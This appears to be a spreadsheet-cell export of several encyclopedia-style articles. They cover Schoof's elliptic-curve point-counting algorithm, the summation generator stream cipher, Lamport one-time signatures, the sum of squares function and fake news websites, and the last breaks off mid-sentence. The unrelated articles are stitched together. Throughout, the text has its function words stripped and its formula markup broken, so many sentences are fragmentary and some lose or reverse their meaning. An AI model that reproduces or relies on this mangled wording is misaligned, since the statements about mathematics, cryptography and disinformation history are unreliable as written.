{\displaystyle thus {\displaystyle (x,y)} belonging {\displaystyle e[l]} also {\displaystyle t(x^{q},y^{q})={\bar {t}}(x^{q},y^{q})} {\displaystyle t\equiv {\bar {t}}{\pmod {l}}} hence reduced problem solving equation {\displaystyle (x^{q^{2}},y^{q^{2}})+{\bar {q}}(x,y)\equiv {\bar {t}}(x^{q},y^{q}),} {\displaystyle {\bar {t}}} {\displaystyle {\bar {q}}} integer values {\displaystyle [-(l-1)/2,(l-1)/2]} computation modulo primes division polynomial roots precisely coordinates points order thus, restrict computation {\displaystyle (x^{q^{2}},y^{q^{2}})+{\bar {q}}(x,y)} l-torsion points means computing expressions functions coordinate ring modulo division polynomial. i.e. working {\displaystyle \mathbb _{q}[x,y]/(y^{2}-x^{3}-ax-b,\psi _{l})} this means particular degree defined {\displaystyle (x(x,y),y(x,y)):=(x^{q^{2}},y^{q^{2}})+{\bar {q}}(x,y)} {\displaystyle (l^{2}-3)/2} scalar multiplication {\displaystyle {\bar {q}}(x,y)} done either double-and-add methods using {\displaystyle {\bar {q}}} division polynomial. latter approach gives: {\displaystyle {\bar {q}}(x,y)=(x_{\bar {q}},y_{\bar {q}})=\left(x-{\frac {\psi _{{\bar {q}}-1}\psi _{{\bar {q}}+1}}{\psi _{\bar {q}}^{2}}},{\frac {\psi _{2{\bar {q}}}}{2\psi _{\bar {q}}^{4}}}\right)} {\displaystyle \psi _{n}} division polynomial. note {\displaystyle y_{\bar {q}}/y} function denote {\displaystyle \theta (x)} must split problem cases: case {\displaystyle (x^{q^{2}},y^{q^{2}})\neq {\bar {q}}(x,y)} case {\displaystyle (x^{q^{2}},y^{q^{2}})=\pm {\bar {q}}(x,y)} note equalities checked modulo {\displaystyle \psi _{l}} case {\displaystyle (x^{q^{2}},y^{q^{2}})\neq {\bar {q}}(x,y)} using addition formula group {\displaystyle e(\mathbb _{q})} obtain: {\displaystyle x(x,y)=\left({\frac {y^{q^{2}}-y_{\bar {q}}}{x^{q^{2}}-x_{\bar {q}}}}\right)^{2}-x^{q^{2}}-x_{\bar {q}}.} note computation fails case assumption inequality wrong. able x-coordinate narrow choice {\displaystyle {\bar {t}}} possibilities, namely positive negative case. using y-coordinate later determines cases holds. first show function alone. consider {\displaystyle (y^{q^{2}}-y_{\bar {q}})^{2}=y^{2}(y^{q^{2}-1}-y_{\bar {q}}/y)^{2}} since {\displaystyle q^{2}-1} even, replacing {\displaystyle y^{2}} {\displaystyle x^{3}+ax+b} rewrite expression {\displaystyle (x^{3}+ax+b)((x^{3}+ax+b)^{\frac {q^{2}-1}{2}}-\theta (x))} {\displaystyle x(x)\equiv (x^{3}+ax+b)((x^{3}+ax+b)^{\frac {q^{2}-1}{2}}-\theta (x)){\bmod {\psi }}_{l}(x).} here, seems right, throw away {\displaystyle x^{q^{2}}-x_{\bar {q}}} {\displaystyle x\equiv x_{\bar {t}}^{q}{\bmod {\psi }}_{l}(x)} {\displaystyle {\bar {t}}\in [0,(l-1)/2]} {\displaystyle {\bar {t}}} satisfies {\displaystyle \phi ^{2}(p)\mp {\bar {t}}\phi (p)+{\bar {q}}p=o} l-torsion points mentioned earlier, using {\displaystyle y_{\bar {t}}^{q}} able determine values {\displaystyle {\bar {t}}} {\displaystyle {\bar {t}}} {\displaystyle -{\bar {t}}} works. this gives value {\displaystyle t\equiv {\bar {t}}{\pmod {l}}} schoof's algorithm stores values {\displaystyle {\bar {t}}{\pmod {l}}} variable {\displaystyle t_{l}} prime considered. case {\displaystyle (x^{q^{2}},y^{q^{2}})=\pm {\bar {q}}(x,y)} begin assumption {\displaystyle (x^{q^{2}},y^{q^{2}})={\bar {q}}(x,y)} since prime cannot {\displaystyle {\bar {q}}(x,y)=-{\bar {q}}(x,y)} thus {\displaystyle {\bar {t}}\neq characteristic equation yields {\displaystyle {\bar {t}}\phi (p)=2{\bar {q}}p} consequently {\displaystyle {\bar {t}}^{2}{\bar {q}}\equiv (2q)^{2}{\pmod {l}}} this implies square modulo {\displaystyle q\equiv w^{2}{\pmod {l}}} compute {\displaystyle w\phi (x,y)} {\displaystyle \mathbb _{q}[x,y]/(y^{2}-x^{3}-ax-b,\psi _{l})} check whether {\displaystyle {\bar {q}}(x,y)=w\phi (x,y)} {\displaystyle t_{l}} {\displaystyle 2w{\pmod {l}}} depending y-coordinate. turns square modulo equation hold {\displaystyle assumption {\displaystyle (x^{q^{2}},y^{q^{2}})=+{\bar {q}}(x,y)} false, thus {\displaystyle (x^{q^{2}},y^{q^{2}})=-{\bar {q}}(x,y)} characteristic equation gives {\displaystyle t_{l}=0} additional case {\displaystyle l=2} recall, initial considerations omit case {\displaystyle l=2} since assume odd, {\displaystyle q+1-t\equiv t{\pmod {2}}} particular, {\displaystyle t_{2}\equiv 0{\pmod {2}}} {\displaystyle e(\mathbb _{q})} element order definition addition group, element order must form {\displaystyle (x_{0},0)} thus {\displaystyle t_{2}\equiv 0{\pmod {2}}} polynomial {\displaystyle x^{3}+ax+b} root {\displaystyle \mathbb _{q}} {\displaystyle \gcd(x^{q}-x,x^{3}+ax+b)\neq algorithm input: elliptic curve {\displaystyle e=y^{2}-x^{3}-ax-b} integer finite field {\displaystyle f_{q}} {\displaystyle q=p^{b},b\geq output: number points {\displaystyle f_{q}} choose primes containing {\displaystyle n=\prod _{l\in s}l&gt;4{\sqrt {q}}.} {\displaystyle t_{2}=0} {\displaystyle \gcd(x^{q}-x,x^{3}+ax+b)\neq else {\displaystyle t_{2}=1} compute division polynomial {\displaystyle \psi _{l}} computations loop performed ring {\displaystyle \mathbb _{q}[x,y]/(y^{2}-x^{3}-ax-b,\psi _{l}).} {\displaystyle l\in {\displaystyle {\bar {q}}} unique integer {\displaystyle q\equiv {\bar {q}}{\pmod {l}}} {\displaystyle \mid {\bar {q}}\mid &lt;l/2} compute {\displaystyle (x^{q},y^{q})} {\displaystyle (x^{q^{2}},y^{q^{2}})} {\displaystyle (x_{\bar {q}},y_{\bar {q}})} {\displaystyle x^{q^{2}}\neq x_{\bar {q}}} compute {\displaystyle (x,y)} {\displaystyle 1\leq {\bar {t}}\leq (l-1)/2} {\displaystyle x=x_{\bar {t}}^{q}} {\displaystyle y=y_{\bar {t}}^{q}} {\displaystyle t_{l}={\bar {t}}} else {\displaystyle t_{l}=-{\bar {t}}} else square modulo compute {\displaystyle q\equiv w^{2}{\pmod {l}}} compute {\displaystyle w(x^{q},y^{q})} {\displaystyle w(x^{q},y^{q})=(x^{q^{2}},y^{q^{2}})} {\displaystyle t_{l}=2w} else {\displaystyle w(x^{q},y^{q})=(x^{q^{2}},-y^{q^{2}})} {\displaystyle t_{l}=-2w} else {\displaystyle t_{l}=0} else {\displaystyle t_{l}=0} chinese remainder theorem compute modulo equations {\displaystyle t\equiv t_{l}{\pmod {l}}} {\displaystyle l\in output {\displaystyle q+1-t} complexity most computation taken evaluation {\displaystyle \phi (p)} {\displaystyle \phi ^{2}(p)} prime {\displaystyle computing {\displaystyle x^{q}} {\displaystyle y^{q}} {\displaystyle x^{q^{2}}} {\displaystyle y^{q^{2}}} prime {\displaystyle this involves exponentiation ring {\displaystyle r=\mathbb _{q}[x,y]/(y^{2}-x^{3}-ax-b,\psi _{l})} requires {\displaystyle o(\log multiplications. since degree {\displaystyle \psi _{l}} {\displaystyle {\frac {l^{2}-1}{2}}} element ring polynomial degree {\displaystyle o(l^{2})} prime number theorem, around {\displaystyle o(\log primes size {\displaystyle o(\log giving {\displaystyle {\displaystyle o(\log obtain {\displaystyle o(l^{2})=o(\log ^{2}q)} thus multiplication ring {\displaystyle requires {\displaystyle o(\log ^{4}q)} multiplications {\displaystyle \mathbb _{q}} turn requires {\displaystyle o(\log ^{2}q)} operations. total, number operations prime {\displaystyle {\displaystyle o(\log ^{7}q)} given computation needs carried {\displaystyle o(\log primes, total complexity schoof's algorithm turns {\displaystyle o(\log ^{8}q)} using fast polynomial integer arithmetic reduces {\displaystyle {\tilde {o}}(\log ^{5}q)} improvements schoof's algorithm 1990s, noam elkies, followed atkin, devised improvements schoof's basic algorithm restricting primes {\displaystyle s=\{l_{1},\ldots ,l_{s}\}} considered primes certain kind. these came called elkies primes atkin primes respectively. prime {\displaystyle called elkies prime characteristic equation: {\displaystyle \phi ^{2}-t\phi +q=0} splits {\displaystyle \mathbb _{l}} atkin prime prime elkies prime. atkin showed combine information obtained atkin primes information obtained elkies primes produce efficient algorithm, came known schoof–elkies–atkin algorithm. first problem address determine whether given prime elkies atkin. order make modular polynomials, come study modular forms interpretation elliptic curves complex numbers lattices. once determined case instead using division polynomials, able work polynomial lower degree corresponding division polynomial: {\displaystyle o(l)} rather {\displaystyle o(l^{2})} efficient implementation, probabilistic root-finding algorithms used, makes vegas algorithm rather deterministic algorithm. under heuristic assumption approximately half primes {\displaystyle o(\log bound elkies primes, yields algorithm efficient schoof's, expected running time {\displaystyle o(\log ^{6}q)} using naive arithmetic, {\displaystyle {\tilde {o}}(\log ^{4}q)} using fast arithmetic. although heuristic assumption known hold elliptic curves, known hold every case, even grh. implementations several algorithms implemented mike scott available source code. implementations free terms, conditions), make miracl library distributed agplv3. schoof's algorithm implementation {\displaystyle e(\mathbb _{p})} prime {\displaystyle schoof's algorithm implementation {\displaystyle e(\mathbb _{2^{m}})} also elliptic curve cryptography counting points elliptic curves division polynomials frobenius endomorphism references schoof: elliptic curves finite fields computation square roots math. comp., 44(170):483–494, 1985. available http://www.mat.uniroma2.it/~schoof/ctpts.pdf schoof: counting points elliptic curves finite fields. theor. nombres bordeaux 7:219–254, 1995. available http://www.mat.uniroma2.it/~schoof/ctg.pdf musiker: schoof's algorithm counting points {\displaystyle e(\mathbb _{q})} available http://www.math.umn.edu/~musiker/schoof.pdf müller berechnung punktanzahl elliptischen kurven über endlichen primkörpern. master's thesis. universität saarlandes, saarbrücken, 1991. available http://lecturer.ukdw.ac.id/vmueller/publications.php enge: elliptic curves applications cryptography: introduction. kluwer academic publishers, dordrecht, 1999. washington: elliptic curves: number theory cryptography. chapman hall/crc, york, 2003. koblitz: course number theory cryptography, graduate texts math. 114, springer-verlag, 1987. second edition, 1994</t>
  </si>
  <si>
    <t>Summation generator</t>
  </si>
  <si>
    <t>summation generator, created 1985, rainer rueppel, cryptography security front-runner late 1980s. operates taking output lfsrs adder carry. operation's strength nonlinear. however, early 1990s various attacks summation generator eventually fall correlation attack. 1995 klapper goresky able determine summation generator's sequence bits. improved summation generator 2-bit memory proposed cryptographers moon. generator scheme extra memory added nonlinear combining function. objective modification make summation generator immune correlation attack. attack improved summation generator reported mex-perera shepherd 2002 exploiting linear relations. besides, june 2005 algebraic attack developed. using attack calculate initial state summation generator within minutes even lfsrs. references rueppel, "correlation immunity summation generator," advances cryptography-eurocrypt proceedings, berlin: springer-verlag, 1986, 260–272. w.meier staffelbach, "correlation properties combiners memory stream ciphers," advances cryptography-eurocrypt proceedings, berlin: springer-verlag, 1991, 204–213. bruce schneier, "applied cryptography," 364, summation generator mex-perera, shepherd, 2002. "cryptanalysis summation generator 2-bit memory". signal process. (dec. 2002), 2025-2028. algebraic attack improved summation generator 2-bit memory" information processing letters, volume issue (january 2005) pages: issn 0020-0190 external links correlation immunity summation generator story combiner correlation algebraic attacks summation generators</t>
  </si>
  <si>
    <t>Lamport signature</t>
  </si>
  <si>
    <t>cryptography, lamport signature lamport one-time signature scheme method constructing digital signature. lamport signatures built cryptographically secure one-way function; usually cryptographic hash function used. although potential development quantum computers threatens security many common forms cryptography rsa, believed lamport signatures large hash functions would still secure event. unfortunately, lamport used sign single message. however, combined hash trees, single could used many messages, making fairly efficient digital signature scheme. lamport signature cryptosystem invented 1979 named inventor, leslie lamport. example alice 256-bit cryptographic hash function kind secure random number generator. wants create lamport pair, private corresponding public key. making pair create private alice uses random number generator produce pairs random numbers (2×256 numbers total), number bits size, total 2×256×256 bits kibit total. this private store away secure place later use. create public hashes random numbers private key, thus creating hashes, bits size. (also kbits total.) these numbers form public key, share world. signing message later alice wants sign message. first hashes message 256-bit hash sum. then, hash, based value bit, picks number corresponding pairs numbers make private (i.e., first number chosen, second chosen). this produces sequence numbers. number bits long total size signature 256×256 bits 65536 bits kibit. these (originally randomly picked) numbers signature publishes along message. note alice's private used, never used again. must destroy numbers signature. otherwise, additional signature reusing private reduces security level adversaries might later create false signatures them. verifying signature then wants verify alice's signature message. also hashes message 256-bit hash sum. then uses bits hash pick hashes alice's public key. picks hashes manner alice picked random numbers signature. that first message hash picks first hash first pair, then hashes random numbers alice's signature. this gives hashes. hashes exactly match hashes picked alice's public signature not, signature wrong. note prior alice publishing signature message, else knows 2×256 random numbers private key. thus, else create proper list random numbers signature. alice published signature, others still know random numbers thus create signatures message hashes. formal description below short description lamport signatures work, written mathematical notation. note "message" description fixed sized block reasonable size, possibly (but necessarily) hash result arbitrary long message signed. keys {\displaystyle positive integer {\displaystyle p=\{0,1\}^{k}} messages. {\displaystyle f:\,y\rightarrow one-way function. {\displaystyle 1\leq i\leq {\displaystyle j\in \{0,1\}} signer chooses {\displaystyle y_{i,j}\in randomly computes {\displaystyle z_{i,j}=f(y_{i,j})} private key, {\displaystyle consists {\displaystyle values {\displaystyle y_{i,j}} public consists {\displaystyle values {\displaystyle z_{i,j}} signing message {\displaystyle m=m_{1}\ldots m_{k}\in \{0,1\}^{k}} message. signature message {\displaystyle \operatorname {sig} (m_{1}\ldots m_{k})=(y_{1,m_{1}},\ldots ,y_{k,m_{k}})=(s_{1},\ldots ,s_{k})} verifying signature verifier validates signature checking {\displaystyle f(s_{i})=z_{i,m_{i}}} {\displaystyle 1\leq i\leq order forge message would invert one-way function {\displaystyle this assumed intractable suitably sized inputs outputs. security parameters security lamport signatures based security one-way hash function length output. hash function generates n-bit message digest, ideal preimage preimage resistance single hash function invocation implies order operations find collision classical computing model. according grover's algorithm, finding preimage collision single invocation ideal hash function upper bound o(2n/2) operations quantum computing model. lamport signatures, public signature based short messages requiring single invocation hash function. private yi,j corresponding zi,j public pair, private length must selected performing preimage attack length input faster performing preimage attack length output. example, degenerate case, private yi,j element bits length, trivial exhaustively search possible private combinations operations find match output, irrespective message digest length. therefore balanced system design ensures lengths approximately equal. based grover's algorithm, quantum secure system, length public elements zi,j, private elements yi,j signature elements si,j must less times larger security rating system. that 80-bit secure system uses element lengths less bit; 128-bit secure system uses element lengths less bit;however caution taken idealistic work estimates assume ideal (perfect) hash function limited attacks target single preimage time. known conventional computing model 23n/5 preimages searched, full cost preimage decreases 2n/2 22n/5. selecting optimum element size taking account collection multiple message digests open problem. selection larger element sizes stronger hash functions, 512-bit elements sha-512, ensures greater security margins manage unknowns. optimisations variants short private instead creating storing random numbers private key, single sufficient size stored. (usually size random numbers private key.) single used seed cryptographically secure pseudorandom number generator (csprng) create random numbers private needed. note cryptographically secure hash least whose output xored seed) used instead csprng signing message would reveal additional random values private key. adversary access signature intended recipients can, forge signature halving security level doubling revealed random values private key. manner single used together csprng create many lamport keys. preferably kind random access csprng used, bbs. short public lamport signature combined hash list, making possible publish single hash instead hashes public key. that instead {\displaystyle values {\displaystyle z_{ij}} verify single hash, signature must include random numbers unused hashes hash list public key, resulting signatures twice size. that values {\displaystyle (z_{ij})} {\displaystyle j\neq m_{i}} needs included. unused hashes need included signature cryptographic accumulator used instead hash list. short keys signature winternitz signature compression reduces size private public slightly less factor chunk size bits {\displaystyle 2\langle {\text{chunk size bits}}\rangle half factor signature. computation increases slightly factor chunk size bits chunk size bits {\displaystyle 2^{\langle {\text{chunk size bits}}\rangle }/\langle {\text{chunk size bits}}\rangle cryptographically secure hash suffices instead requirement csprng.a hash list could also employed shorten public single value expense doubling size signature explained prior section. public multiple messages each lamport public used sign single message, means many keys published many messages signed. hash tree used public keys, publishing hash hash tree instead. this increases size resulting signature, since parts hash tree included signature, makes possible publish single hash used verify given number future signatures. also s/key references further reading lamport, constructing digital signatures one-way function, technical report sri-csl-98, international computer science laboratory, oct. 1979. efficient merkle trees labs explanation original purpose merkle trees lamport signatures, efficient one-time signature scheme. introduction hash-based signatures merkle signatures adam langley. reference implementation lamport scheme blake2b (c++) reference implementation lamport signatures sha256, sha512, blake2b (rust)</t>
  </si>
  <si>
    <t>Sum of squares function</t>
  </si>
  <si>
    <t>number theory, squares function arithmetic function gives number representations given positive integer squares, representations differ order summands signs numbers squared counted different, denoted rk(n). definition function defined {\displaystyle r_{k}(n)=|\{(a_{1},a_{2},\ldots ,a_{k})\in \mathbb ^{k}\ n=a_{1}^{2}+a_{2}^{2}+\cdots +a_{k}^{2}\}|} {\displaystyle |\,\ denotes cardinality set. words, rk(n) number ways written squares. example, {\displaystyle r_{2}(1)=4} since {\displaystyle 1=0^{2}+(\pm 1)^{2}=(\pm 1)^{2}+0^{2}} sign combinations, also {\displaystyle r_{2}(2)=4} since {\displaystyle 2=(\pm 1)^{2}+(\pm 1)^{2}} four sign combinations. hand, {\displaystyle r_{2}(3)=0} represent squares. formulae number ways write natural number squares given r2(n). given explicitly {\displaystyle r_{2}(n)=4(d_{1}(n)-d_{3}(n))} d1(n) number divisors congruent modulo d3(n) number divisors congruent modulo using sums, expression written {\displaystyle r_{2}(n)=4\sum _{d\mid \atop d\,\equiv \,1,3{\pmod {4}}}(-1)^{(d-1)/2}} prime factorization {\displaystyle n=2^{g}p_{1}^{f_{1}}p_{2}^{f_{2}}\cdots q_{1}^{h_{1}}q_{2}^{h_{2}}\cdots {\displaystyle p_{i}} prime factors form {\displaystyle p_{i}\equiv 1{\pmod {4}},} {\displaystyle q_{i}} prime factors form {\displaystyle q_{i}\equiv 3{\pmod {4}}} gives another formula {\displaystyle r_{2}(n)=4(f_{1}+1)(f_{2}+1)\cdots exponents {\displaystyle h_{1},h_{2},\cdots even. {\displaystyle h_{i}} odd, {\displaystyle r_{2}(n)=0} gauss proved squarefree number otherwise {\displaystyle r_{3}(n)={\begin{cases}24h(-n),&amp;{\text{if }}n\equiv 3{\pmod {8}},\\0&amp;{\text{if }}n\equiv 7{\pmod {8}},\\12h(-4n)&amp;{\text{otherwise}},\end{cases}}} h(m) denotes class number integer number ways represent four squares carl gustav jakob jacobi eight times divisors divisible i.e. {\displaystyle r_{4}(n)=8\sum _{d\,\mid \,n,\ 4\,\nmid \,d}d.} representing 2km, integer, express {\displaystyle r_{4}(n)} terms divisor function follows: {\displaystyle r_{4}(n)=8\sigma (2^{\min\{k,1\}}m).} jacobi also found explicit formula case {\displaystyle r_{8}(n)=16\sum _{d\,\mid \,n}(-1)^{n+d}d^{3}.} generating function generating function sequence {\displaystyle r_{k}(n)} fixed expressed terms jacobi theta function: {\displaystyle \vartheta (0;q)^{k}=\vartheta _{3}^{k}(q)=\sum _{n=0}^{\infty }r_{k}(n)q^{n},} {\displaystyle \vartheta (0;q)=\sum _{n=-\infty }^{\infty }q^{n^{2}}=1+2q+2q^{4}+2q^{9}+2q^{16}+\cdots numerical values first values {\displaystyle r_{k}(n),\;k=1,\dots listed table below: also jacobi's four-square theorem gauss circle problem references external links weisstein, eric "sum squares function". mathworld. sloane, (ed.). "sequence a122141 (number ways writing squares)". on-line encyclopedia integer sequences. oeis foundation. sloane, (ed.). "sequence a004018 (theta series square lattice, r_2(n))". on-line encyclopedia integer sequences. oeis foundation.</t>
  </si>
  <si>
    <t>Fake news website</t>
  </si>
  <si>
    <t>fake news websites (also referred hoax news websites) internet websites deliberately publish fake news—hoaxes, propaganda, disinformation purporting real news—often using social media drive traffic amplify effect. unlike news satire, fake news websites deliberately seek perceived legitimate taken face value, often financial political gain. such sites promoted political falsehoods india, germany, indonesia philippines, sweden, mexico, myanmar, united states. many sites originate promoted russia, north macedonia, romania, united states. overview coverage pan-european newspaper, local, described proliferation fake news form psychological warfare. some media analysts seen threat democracy. 2016, european parliament's committee foreign affairs passed resolution warning russian government using "pseudo-news agencies" internet trolls disinformation propaganda weaken confidence democratic values.in 2015, swedish security service, sweden's national security agency, issued report concluding russia using fake news inflame "splits society" proliferation propaganda. sweden's ministry defence tasked civil contingencies agency combating fake news russia. fraudulent news affected politics indonesia philippines, simultaneously widespread usage social media limited resources check veracity political claims. german chancellor angela merkel warned societal impact "fake sites, bots, trolls".fraudulent articles spread social media 2016 u.s. presidential election, several officials within u.s. intelligence community said russia engaged spreading fake news. computer security company fireeye concluded russia used social media spread fake news stories part cyberwarfare campaign. google facebook banned fake sites using online advertising. facebook launched partnership fact-checking websites flag fraudulent news hoaxes; debunking organizations joined initiative included: snopes.com, factcheck.org, politifact. u.s. president barack obama said disregard facts created "dust cloud nonsense". chief secret intelligence service (mi6) alex younger called fake news propaganda online dangerous democratic nations. definition york times defined "fake news" internet fictitious articles deliberately fabricated deceive readers, generally goal profiting clickbait. politifact described fake news fabricated content designed fool readers subsequently made viral internet crowds increase dissemination. others taken constitutive "systemic features inherent design sources channels fake news proliferates", example playing audience's cognitive biases, heuristics, partisan affiliation. some fake news websites website spoofing, structured make visitors believe visiting trusted sources like news msnbc.fake news maintained presence internet tabloid journalism years prior 2016 u.s. presidential election. before election campaign involving hillary clinton donald trump, fake news impacted election process subsequent events high degree. subsequent 2016 election, issue fake news turned political weapon, supporters left-wing politics saying supporters right-wing politics spread false news, latter claimed "censored". back-and-forth complaints, definition fake news used polemics become vague. pre-internet history unethical journalistic practices existed printed media hundreds years advent internet. yellow journalism, reporting standard devoid morals professional ethics, pervasive time period history known gilded age, unethical journalists would engage fraud fabricating stories, interviews, made-up names scholars. during 1890s, spread unethical news sparked violence conflicts. both joseph pulitzer william randolph hearst fomented yellow journalism order increase profits, helped lead misunderstandings became partially responsible outset spanish–american 1898. j.b. montgomery-m’govern wrote column harshly critical "fake news" 1898, saying characterized "fake news" sensationalism "the publication articles absolutely false, tend mislead ignorant unsuspecting public."a radio broadcast gleiwitz german soldier karl homack, pretending polish invader captured station, taken face value stations, germany abroad, fueling adolf hitler's declaration poland next day. according today, newspapers history commonly publishing fake news included globe, weekly world news, national enquirer. prominent sources prominent among fraudulent news sites include false propaganda created individuals countries russia, north macedonia, romania, united states. north macedonia much fake news 2016 u.s. presidential election season traced adolescents macedonia, specifically veles. town 50,000 middle country, high unemployment, average wage $4,800. income fake news characterized news gold rush. adults supported income, saying happy youths working. mayor veles, slavcho chadiev, said bothered actions, macedonian finances taxable. chadiev said happy deception veles influenced results 2016 u.s. election favor trump.buzzfeed news guardian separately investigated found teenagers veles created sites spreading fake news stories supportive donald trump. teenagers experimented left slanted fake stories bernie sanders, found pro-trump fictions popular. prior 2016 election teenagers gained revenues fake medical advice sites. youth named alex stated, august 2016 interview guardian, fraud would remain profitable regardless election. alex explained plagiarized material articles copying pasting websites. this could thousands dollars daily, averaged thousand month.the associated press (ap) interviewed 18-year-old veles tactics. google analytics analysis traffic showed 650,000 views week. plagiarized pro-trump stories right-wing site called political insider. said care politics, published fake news gain money experience. used domaintools confirm teenager behind fake sites, determined websites tracked veles focused u.s. news, many mostly contained plagiarized legitimate news create appearance credibility.nbc news also interviewed 18-year-old there. dmitri pseudonym) profitable fake news operators town, said people veles wrote fake sites. dmitri said gained $60,000 months prior this, parents' earnings. dmitri said main dupes supporters trump. said 2016 u.s. election continued earn significant amounts.the 2020 u.s. election next project. romania "ending fed", popular purveyor fraudulent reports, 24-year-old named ovidiu drobota oradea, romania, boasted inc. magazine popular mainstream media. established march 2016, "ending fed" responsible false story august 2016 incorrectly stated news fired journalist megyn kelly—the story briefly prominent facebook "trending news" section. "ending fed" held four popular fake articles facebook related 2016 u.s. election prior three months election itself. facebook page website, called "end feed", 350,000 "likes" november 2016. after contacted inc. magazine, drobota stated proud impact 2016 u.s. election favor preferred candidate donald trump. according alexa internet, "ending fed" garnered approximately million views 30-day-period november 2016. drobota stated majority incoming traffic facebook. said normal line work starting "ending fed" included development search engine optimization. russia internet research agency beginning fall 2014, yorker writer adrian chen performed six-month investigation russian propaganda dissemination online internet research agency (ira). yevgeny prigozhin (evgeny prigozhin), close associate vladimir putin, behind operation hired hundreds individuals work saint petersburg. organization became regarded "troll farm", term used refer propaganda efforts controlling many accounts online artificially providing semblance grassroots organization. chen reported internet trolling used russian government tactic largely observing social media organization 2011 protests putin. european union response 2015, organization security co-operation europe released analysis critical disinformation campaigns russia masked news. this intended interfere ukraine relations europe removal former ukraine president viktor yanukovych. according deutsche welle, similar tactics used 2016 u.s. elections. european union created taskforce deal russian disinformation. taskforce, east stratcom team, people including russian speakers. november 2016, voted increase group's funding. november 2016, european parliament committee foreign affairs passed resolution warning russia tools including: "pseudo-news agencies social media internet trolls" disinformation weaken democratic values. resolution requested analysts investigate, explaining member nations needed wary disinformation. resolution condemned russian sources publicizing "absolutely fake" news reports. tally november 2016 passed margin votes 179. united states u.s. state department planned unit called counter-disinformation team, formed intention combating disinformation russian government, disbanded september 2015 department heads missed scope propaganda 2016 u.s. election. u.s. state department eight months developing unit scrapping would reboot active measures working group reagan administration. counter-disinformation team bureau international information programs. work began 2014, intention combat propaganda russian sources network (formerly known russia today). u.s. intelligence officials explained former national security agency analyst counterintelligence officer john schindler obama administration decided cancel unit afraid antagonizing russia. u.s. undersecretary state public diplomacy richard stengel point person unit canceled. stengel previously wrote disinformation internet trolls shift focus trump adrian chen observed pattern december 2015 pro-russian accounts became supportive 2016 u.s. presidential candidate donald trump. andrew weisburd foreign policy research institute fellow senior fellow center cyber homeland security george washington university, clint watts, wrote daily beast august 2016 russian propaganda fabricated articles popularized social media. weisburd watts documented disinformation spread russia today sputnik news, "the biggest russian state-controlled media organizations publishing english", pro-russian accounts twitter. citing research chen, weisburd watts compared russian tactics 2016 u.s. election soviet union cold strategies. they referenced 1992 united states information agency report congress, warned russian propaganda called active measures. they concluded social media made active measures easier. institute international relations prague senior fellow scholar russian intelligence, mark galeotti, agreed kremlin operations form active measures. strident internet promoters trump u.s. citizens paid russian propagandists. guardian estimated number "low thousands" november 2016.weisburd watts collaborated colleague berger published follow-up daily beast article online magazine rocks, titled: "trolling trump: russia trying destroy democracy". they researched 7,000 pro-trump accounts 2+1⁄2-year period. their research detailed trolling techniques denigrate critics russian activities syria, proliferate lies clinton's health. watts said propaganda targeted alt-right, right wing, fascist groups. after presidential debate, thousands twitter bots used hashtag #trumpwon change perceptions.in november 2016 foreign policy research institute stated russian propaganda exacerbated criticism clinton support trump. strategy involved social media, paid internet trolls, botnets, websites order denigrate clinton. u.s. intelligence analysis computer security company fireeye concluded russia used social media weapon influence u.s. election. fireeye chairman david dewalt said 2016 operation development cyberwarfare russia. fireeye kevin mandia stated russian cyberwarfare changed fall 2014, covert overt tactics decreased operational security. bellingcat analyst aric toler explained fact-checking drew attention fake news problem.u.s. intelligence agencies debated putin chose summer 2016 escalate active measures. prior election, u.s. national security officials said anxious russia tampering u.s. news. director national intelligence james clapper said 2011–13 russian protests, putin lost self-confidence, responded propaganda operation. former officer patrick skinner said goal spread uncertainty. house intelligence committee ranking member adam schiff commented putin's aims, said u.s. intelligence concerned russian propaganda. speaking disinformation appeared hungary, slovakia, czech republic, poland, schiff said increase behavior u.s.u.s. intelligence officials stated november 2016 believed russia engaged spreading fake news, released statement saying investigating. u.s. intelligence officials told buzzfeed news "believe russia helped disseminate fake propagandized news part broader effort influence undermine presidential election". u.s. intelligence sources stated involved "dissemination completely fake news stories". they told buzzfeed investigation specifically focused "russia engaged spreading false misleading information". country fake news influenced political discourse multiple countries, including germany, indonesia, philippines, sweden, china, myanmar, united states. austria politicians austria dealt impact fake news spread social media 2016 presidential campaign country. december 2016, court austria issued injunction facebook europe, mandating block negative postings related glawischnig-piesczek, austrian green party chairwoman. according washington post postings facebook "appeared spread fake profile" directed derogatory epithets towards austrian politician. derogatory postings likely created identical fake profile previously utilized attack alexander bellen, election president austria. brazil brazil faced increasing influence fake news 2014 re-election president dilma rousseff rousseff's subsequent impeachment august 2016. week surrounding impeachment votes, most-shared articles facebook brazil fake. 2015, reporter nalon resigned position brazilian newspaper folha s.paulo order start first fact-checking website brazil, called fatos facts). nalon told guardian great deal fake news, hesitated compare problem experienced u.s. canada fake news online brought attention canadian politicians november 2016, debated helping assist local newspapers. member parliament vancouver centre hedy specifically discussed fake news example ways publishers internet less accountable print media. discussion parliament contrasted increase fake news online downsizing canadian newspapers impact democracy canada. representatives facebook canada attended meeting told members parliament felt duty assist individuals gather data online. china fake news 2016 u.s. election spread china. articles popularized within united states translated chinese spread within china. government china used growing problem fake news rationale increasing internet censorship china november 2016. china published editorial communist party newspaper global times called: "western media's crusade against facebook", criticized "unpredictable" political problems posed freedoms enjoyed users twitter, google, facebook. china government leaders meeting wuzhen third world internet conference november 2016 said fake news u.s. election justified adding curbs free open internet. china deputy minister xianliang, official cyberspace administration china, said increasing online participation "harmful information" fraud. chow wong, former hong kong enforcement official criminal justice professor xavier university, praised attempts u.s. patrol social media. wall street journal noted china's themes internet censorship became relevant world internet conference outgrowth fake news. finland officials countries held meeting helsinki november 2016, order plan formation center combat disinformation cyber-warfare including spread fake news social media. center planned located helsinki include efforts countries participation sweden, germany, finland, u.s. prime minister finland juha sipilä planned deal center spring 2017 motion parliament finland. jori arvonen, deputy secretary state affairs, said cyberwarfare became increased problem 2016, included hybrid cyber-warfare intrusions finland russia islamic state iraq levant. arvonen cited examples including fake news online, disinformation, "little green men" russo-ukrainian war. france france uptick amounts disinformation propaganda, primarily midst election cycles. monde fact-checking division "les décodeurs" headed samuel laurent, told guardian december 2016 upcoming french presidential election campaign spring 2017 would face problems fake news. country faced controversy regarding fake websites providing false information abortion. government's lower parliamentary body moved forward intentions fake sites. laurence rossignol, women's minister france, informed parliament though fake sites look neutral, actuality intentions specifically targeted give women fake information. during 10-year period preceding 2016, france witness increase popularity far-right alternative news sources called fachosphere ("facho" referring fascist); known extreme right internet. according sociologist antoine bevort, citing data alexa internet rankings, consulted political websites france included égalité réconciliation, françois desouche, moutons enragés. these sites increased skepticism towards mainstream 